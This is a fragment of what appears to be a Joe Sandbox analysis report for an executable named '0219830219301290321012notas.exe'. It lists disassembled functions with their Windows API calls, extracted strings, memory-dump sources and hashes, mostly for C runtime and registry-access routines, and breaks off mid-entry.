Instruction Fuzzy Hash: 93210835A01360BBCF218B299C40B2B3B589F1176BF180220ED05E7291D730ED4896F2

Uniqueness

Uniqueness Score: -1.00%

Function 00D56D55 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00D56D1D: _free.LIBCMT ref: 00D56D42

_free.LIBCMT ref: 00D56DA3

Part of subcall function 00D5363A: HeapFree.KERNEL32(00000000,00000000,?,00D56D47,?,00000000,?,?,?,00D56D6E,?,00000007,?,?,00D571E8,?), ref: 00D53650
Part of subcall function 00D5363A: GetLastError.KERNEL32(?,?,00D56D47,?,00000000,?,?,?,00D56D6E,?,00000007,?,?,00D571E8,?,?), ref: 00D53662

_free.LIBCMT ref: 00D56DAE
_free.LIBCMT ref: 00D56DB9
_free.LIBCMT ref: 00D56E0D
_free.LIBCMT ref: 00D56E18
_free.LIBCMT ref: 00D56E23
_free.LIBCMT ref: 00D56E2E

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2963ffc26b61ef26470c5cc6503304249528645d02ca6a10ee3de8037808b7bd
Instruction ID: abfa767972f7ecc7f06c0f0a87158a29f0ae82dd4be6f019b61d3e0247dc102b
Opcode Fuzzy Hash: 2963ffc26b61ef26470c5cc6503304249528645d02ca6a10ee3de8037808b7bd
Instruction Fuzzy Hash: 8411ED71640B44B6DD20BB70CC06FCB77A8EF14742F904C1ABE9A67152D7B5E5089B70

Uniqueness

Uniqueness Score: -1.00%

Function 00D59CE5 Relevance: 9.3, APIs: 6, Instructions: 319fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32 ref: 00D59D2D
__fassign.LIBCMT ref: 00D59F0C
__fassign.LIBCMT ref: 00D59F29
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D59F71
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00D59FB1
GetLastError.KERNEL32 ref: 00D5A05D

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 9cc82223a4a2ad48f9f5ccbe7025b156eb9b7ba3bb75a8948ae9c277da8ee029
Instruction ID: 2085c1ad966ee1ad1ca977e28afa3bc442e5499155205b360ec190eb68f44614
Opcode Fuzzy Hash: 9cc82223a4a2ad48f9f5ccbe7025b156eb9b7ba3bb75a8948ae9c277da8ee029
Instruction Fuzzy Hash: EED16771D002589FCF15CFA8C8909EDBBB5EF49315F28416AEC55EB342D631AA4ACB70

Uniqueness

Uniqueness Score: -1.00%

Function 00D4C4AC Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00D4C4A3,00D4B3E4), ref: 00D4C4BA
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D4C4C8
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D4C4E1
SetLastError.KERNEL32(00000000,?,00D4C4A3,00D4B3E4), ref: 00D4C533

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 65e94719e5e68fd94908a3d274a5320f8133b0be336376609af80c227cda44b4
Instruction ID: f73c3d18bce6c5368b29237314659ab822e2b0e311371fa950f13ae153c5081b
Opcode Fuzzy Hash: 65e94719e5e68fd94908a3d274a5320f8133b0be336376609af80c227cda44b4
Instruction Fuzzy Hash: AF01473392E3115FAB642B78BC9563A2E98DB0637B730033AF910D42F2EF519C005570

Uniqueness

Uniqueness Score: -1.00%

Function 00D4798F Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 165COMMON

Download Yara Rule

APIs

Part of subcall function 00D41BDC: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,00D4100A), ref: 00D41BE2
Part of subcall function 00D41BDC: GetLastError.KERNEL32(?,00000000,00000000,?,00D4100A), ref: 00D41BEC

GetModuleFileNameW.KERNEL32(00D40000,?,00000104), ref: 00D47A4C
GetModuleHandleW.KERNEL32(00000000), ref: 00D47AA0

Strings

Module, xrefs: 00D47B31
REGISTRY, xrefs: 00D47B7F
Module_Raw, xrefs: 00D47B51

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: Module$CriticalErrorFileHandleInitializeLastNameSection
String ID: Module$Module_Raw$REGISTRY
API String ID: 3798416324-549000027
Opcode ID: fec66e3a26b597bcd6f8f6028aafa6be886fb60b61bad5c198c7d47779c70d36
Instruction ID: 0a3272926f60952734d77ab6985edd19bcb61c2dd531c2f2920c3faf391b3048
Opcode Fuzzy Hash: fec66e3a26b597bcd6f8f6028aafa6be886fb60b61bad5c198c7d47779c70d36
Instruction Fuzzy Hash: D3518375A043299BDB20DB64DD81AEE73B9EF49300F0445A9E90AE7541EB31AF84CF71

Uniqueness

Uniqueness Score: -1.00%

Function 00D418D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 55COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,?,?,00D4182D,00000000), ref: 00D4190C
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,00D4182D,00000000), ref: 00D41913
CloseHandle.KERNEL32(?), ref: 00D41950

Strings

.Wup1Wu, xrefs: 00D41950
SeShutdownPrivilege, xrefs: 00D418ED

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: Process$CloseCurrentHandleOpenToken
String ID: SeShutdownPrivilege$.Wup1Wu
API String ID: 4052875653-1233739197
Opcode ID: d6fa1c8f4b2e5f5a23c4c8c8a82cc3d2d94fdba2978f0298412405e96c43ea64
Instruction ID: 3863952c4ccad2afbc153310aa67252c710012ddddff312ed7f84afe927419aa
Opcode Fuzzy Hash: d6fa1c8f4b2e5f5a23c4c8c8a82cc3d2d94fdba2978f0298412405e96c43ea64
Instruction Fuzzy Hash: 0E110675A00329ABDB109FA9DC09AEFBBB8EF08740F040015E515F6290DBB49A448FB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D41D9C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,?,00D41E33,00000000,00020019,?,?,00000000,?,?,?,?,?,00D41195), ref: 00D41DAE
GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 00D41DBE
RegOpenKeyExW.ADVAPI32(00000000,00020019,00000000,80000002,00D41195,?,?,?,00D41E33,00000000,00020019,?,?,00000000), ref: 00D41DEE

Strings

Advapi32.dll, xrefs: 00D41DA9
RegOpenKeyTransactedW, xrefs: 00D41DB8

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: AddressHandleModuleOpenProc
String ID: Advapi32.dll$RegOpenKeyTransactedW
API String ID: 1337834000-3913318428
Opcode ID: 183ac0fae549c5a4f38f65d5003550b2db93bc25126f26266c0836fa962ba18b
Instruction ID: 7dd7bf2cd85850d777e168e4c247cd402ae8936ebbba22a1893f4337d91ba88d
Opcode Fuzzy Hash: 183ac0fae549c5a4f38f65d5003550b2db93bc25126f26266c0836fa962ba18b
Instruction Fuzzy Hash: 62F0127A900205BFCF215FA5EC04D9B7F79EF8A791B184429FA45D0024DB72C9A1EB71

Uniqueness

Uniqueness Score: -1.00%

Function 00D41A3F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(comctl32.dll,00000000,00000001,?,?,00D41816,00000000), ref: 00D41A5D
GetProcAddress.KERNEL32(00000000,TaskDialogIndirect), ref: 00D41A6F
FreeLibrary.KERNEL32(00000000,?,?,00D41816,00000000), ref: 00D41A86

Strings

TaskDialogIndirect, xrefs: 00D41A69
comctl32.dll, xrefs: 00D41A53

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: TaskDialogIndirect$comctl32.dll
API String ID: 145871493-2809879075
Opcode ID: 288afac00bf0f6a1721a082837f4786e0db7fb2b07254239fb9cfdfaef649601
Instruction ID: 5822152c380b3672c87b2a3a3e3bf9437d20628c269a7f1e542e733e303552d8
Opcode Fuzzy Hash: 288afac00bf0f6a1721a082837f4786e0db7fb2b07254239fb9cfdfaef649601
Instruction Fuzzy Hash: 38F08235602715BFD3205B28AC49B6ABB98EF45B21F088135FD08D6381D7A4DC4586F1

Uniqueness

Uniqueness Score: -1.00%

Function 00D515C6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00D515BB,?,?,00D51583,?,?,?), ref: 00D515DB
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D515EE
FreeLibrary.KERNEL32(00000000,?,?,00D515BB,?,?,00D51583,?,?,?), ref: 00D51611

Strings

mscoree.dll, xrefs: 00D515D4
CorExitProcess, xrefs: 00D515E6

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 8b2dabfaaba5be78a10d086c6e2a5de9a2869481815ab4ad1e8e448e440b29a9
Instruction ID: c4c89fd585597229c8fc021eee7b70b6c64dc6d263b644755c7aee52e19930f7
Opcode Fuzzy Hash: 8b2dabfaaba5be78a10d086c6e2a5de9a2869481815ab4ad1e8e448e440b29a9
Instruction Fuzzy Hash: 1AF05E35941318FBDB21AB90DD09FAEBE68EB01723F080160AC44E62A0CB314E04DAB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D51D83 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00D51DA1
_free.LIBCMT ref: 00D51DC1
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D51E22
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D51E34
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D51E41

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: __crt_fast_encode_pointer$_free
String ID:
API String ID: 366466260-0
Opcode ID: e03a82e23109513485ff0f15b39f56d8423d4eae5186f3f5829e465c396f81c3
Instruction ID: 683af2da281fc605381627bd0745e2f7de8b7b72fa8425214af20ef77a97a20d
Opcode Fuzzy Hash: e03a82e23109513485ff0f15b39f56d8423d4eae5186f3f5829e465c396f81c3
Instruction Fuzzy Hash: 6931B179A00204ABCF14DF68C841B9DB7B2EF85705F298599ED05EB391DB31AE06CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00D56CB4 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00D56CCC

Part of subcall function 00D5363A: HeapFree.KERNEL32(00000000,00000000,?,00D56D47,?,00000000,?,?,?,00D56D6E,?,00000007,?,?,00D571E8,?), ref: 00D53650
Part of subcall function 00D5363A: GetLastError.KERNEL32(?,?,00D56D47,?,00000000,?,?,?,00D56D6E,?,00000007,?,?,00D571E8,?,?), ref: 00D53662

_free.LIBCMT ref: 00D56CDE
_free.LIBCMT ref: 00D56CF0
_free.LIBCMT ref: 00D56D02
_free.LIBCMT ref: 00D56D14

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2204f1505f82eb683fdf522061481f4458cd641c35483bd1bf6d4f962efe2d89
Instruction ID: a7323d21dfc4a12c57f4f3d3e2ad10d1cd8493d80184a38d254b827573f27f23
Opcode Fuzzy Hash: 2204f1505f82eb683fdf522061481f4458cd641c35483bd1bf6d4f962efe2d89
Instruction Fuzzy Hash: 39F01232504340B78E25DB59E681C1677F9FB007967A98809FC89E7601CB74FC845A78

Uniqueness

Uniqueness Score: -1.00%

Function 00D5169A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\0219830219301290321012notas.exe, xrefs: 00D516D8, 00D516DF, 00D51713

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\0219830219301290321012notas.exe
API String ID: 0-2934812102
Opcode ID: c3f0af72d859bf0bec064ba57edd3c5313c976de7c0c657712f03e2c42974f06
Instruction ID: 241031fb1b670d8afe71b471e3033347855645ca9323a79a199bd500f3cfa0c0
Opcode Fuzzy Hash: c3f0af72d859bf0bec064ba57edd3c5313c976de7c0c657712f03e2c42974f06
Instruction Fuzzy Hash: 9C413F79A00314EBCF15DF99D885EAEBBB8EB89751B14406AEC04D7351E7B08A44DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D48399 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 00D483CC
GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 00D483DC

Strings

RegCreateKeyTransactedW, xrefs: 00D483D6
Advapi32.dll, xrefs: 00D483C7

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegCreateKeyTransactedW
API String ID: 1646373207-2994018265
Opcode ID: b0f3cb32feca737629ff0f3a16017f3f5a88d5fe404038ed6c395e7a65e4534f
Instruction ID: ba49e5e7315bb264ebd8396c862f6f17b892f24dec5a02d11583ffdfed874acb
Opcode Fuzzy Hash: b0f3cb32feca737629ff0f3a16017f3f5a88d5fe404038ed6c395e7a65e4534f
Instruction Fuzzy Hash: 63216FB1A00206BFEB14DFA8DC44EBFB7B9EBC8740B04842DB51A92141DB709905DB70

Uniqueness

Uniqueness Score: -1.00%

Function 00D5B59D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,?,?,00D5B4D3,?,00D68E78,0000000C,00D5B57B,?,?,?), ref: 00D5B5F3
GetLastError.KERNEL32(?,00D5B4D3,?,00D68E78,0000000C,00D5B57B,?,?,?), ref: 00D5B5FD
__dosmaperr.LIBCMT ref: 00D5B628

Strings

.Wup1Wu, xrefs: 00D5B5F3

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID: .Wup1Wu
API String ID: 2583163307-3681912474
Opcode ID: f1fa5cf7975e56027b0995660281ebfce44ac01fb6a48bb0415cdcca7b7f2633
Instruction ID: 66942e36b865cf52e0539afd9af602ea69ed8da607e51f6440366ef37348673e
Opcode Fuzzy Hash: f1fa5cf7975e56027b0995660281ebfce44ac01fb6a48bb0415cdcca7b7f2633
Instruction Fuzzy Hash: 9E0108326002101ACE296234A845B7E6785DB92B37F2D015AFD05DB2D2EF61C8898270

Uniqueness

Uniqueness Score: -1.00%

Function 00D48BA7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,00000000,?,00D48AEA,?,?,?,?), ref: 00D48BCE
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00D48BDE

Part of subcall function 00D48B55: GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,?,00D48BBE,?,?,00000000,?,00D48AEA,?,?,?,?), ref: 00D48B67
Part of subcall function 00D48B55: GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 00D48B77

Strings

RegDeleteKeyExW, xrefs: 00D48BD8
Advapi32.dll, xrefs: 00D48BC9

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegDeleteKeyExW
API String ID: 1646373207-2191092095
Opcode ID: 342ee6204154780a4fc54418378e671514afcfc6264346a379c5cabc8fe8d589
Instruction ID: 197898de569b315b96504202589061d789757dbff7d985f78f3bf5e52b68d436
Opcode Fuzzy Hash: 342ee6204154780a4fc54418378e671514afcfc6264346a379c5cabc8fe8d589
Instruction Fuzzy Hash: ED018B79104344EFDB216F58EC40F593BA8EB04392F08441AF981D3271CBA29490BB74

Uniqueness

Uniqueness Score: -1.00%

Function 00D48B55 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,?,00D48BBE,?,?,00000000,?,00D48AEA,?,?,?,?), ref: 00D48B67
GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 00D48B77

Strings

RegDeleteKeyTransactedW, xrefs: 00D48B71
Advapi32.dll, xrefs: 00D48B62

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegDeleteKeyTransactedW
API String ID: 1646373207-2168864297
Opcode ID: 02d816540228c9ff6a47bae1e35d42179c9e7e29e18859a3bf245124f88e1890
Instruction ID: 4ef4a439d56231ac720e144ced8e3ca73c4bad8346276585e9fbdd4eb0cf95c4
Opcode Fuzzy Hash: 02d816540228c9ff6a47bae1e35d42179c9e7e29e18859a3bf245124f88e1890
Instruction Fuzzy Hash: 3FF0A772600704BF97305FAAEC04E6B77ACEFC1BA2708403AF689C1010DA718441E770

Uniqueness

Uniqueness Score: -1.00%

Function 00D423D9 Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00D423E3
GetModuleHandleW.KERNEL32(00000000,00000820), ref: 00D423EB
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00D423FE
_wcsrchr.LIBVCRUNTIME ref: 00D4242D

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: Module$FileH_prolog3_HandleName_wcsrchr
String ID:
API String ID: 3248668939-0
Opcode ID: dd3b939616509364ea5aec255370c707f349c8c56231b2f85ebe17f7cafb3017
Instruction ID: 124681da32950e53f50fc03e92da0de35a9e2f02d59126bddb011e6cd999cc7c
Opcode Fuzzy Hash: dd3b939616509364ea5aec255370c707f349c8c56231b2f85ebe17f7cafb3017
Instruction Fuzzy Hash: D051A17550011A9FCF24EF64CC956EAB3B5FB64304F848194E88AA7551EF706E85CFE0

Uniqueness

Uniqueness Score: -1.00%

Function 00D531D2 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00D4179A,?,00D4EBD7,00D4179A,00000000,?,?,00D4EC92,E9800040,00000000,?), ref: 00D531D7
_free.LIBCMT ref: 00D53234
_free.LIBCMT ref: 00D5326A
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00D4EC92,E9800040,00000000,?), ref: 00D53275

Memory Dump Source

Source File: 00000000.00000002.1352193890.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.1352176837.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352220255.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352242403.0000000000D6A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352261762.0000000000D6C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_0219830219301290321012notas.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 0f8e8d1ea80ee7131221c7b85965cb56b28886a5743c20840bf3d7fb5bd1bba6
Instruction ID: 1a8071f05231fb8e49a89f3b0713f808c0b26359e0833a9ad9ed73e3dd832778
